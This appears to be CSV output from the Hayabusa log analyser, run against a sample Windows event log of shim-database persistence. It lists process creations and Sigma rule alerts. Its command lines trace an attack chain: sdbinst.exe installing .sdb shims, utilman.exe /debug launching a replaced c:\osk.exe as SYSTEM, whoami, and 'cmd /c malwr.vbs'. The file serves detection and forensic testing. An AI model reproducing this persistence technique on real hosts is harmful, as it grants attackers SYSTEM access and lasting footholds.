2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\osk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\wsqmcons.exe ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb : Path: C:\Windows\System32\rundll32.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" : Path: C:\Program Files\Windows NT\Accessories\wordpad.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\servicing\TrustedInstaller.exe : Path: C:\Windows\servicing\TrustedInstaller.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
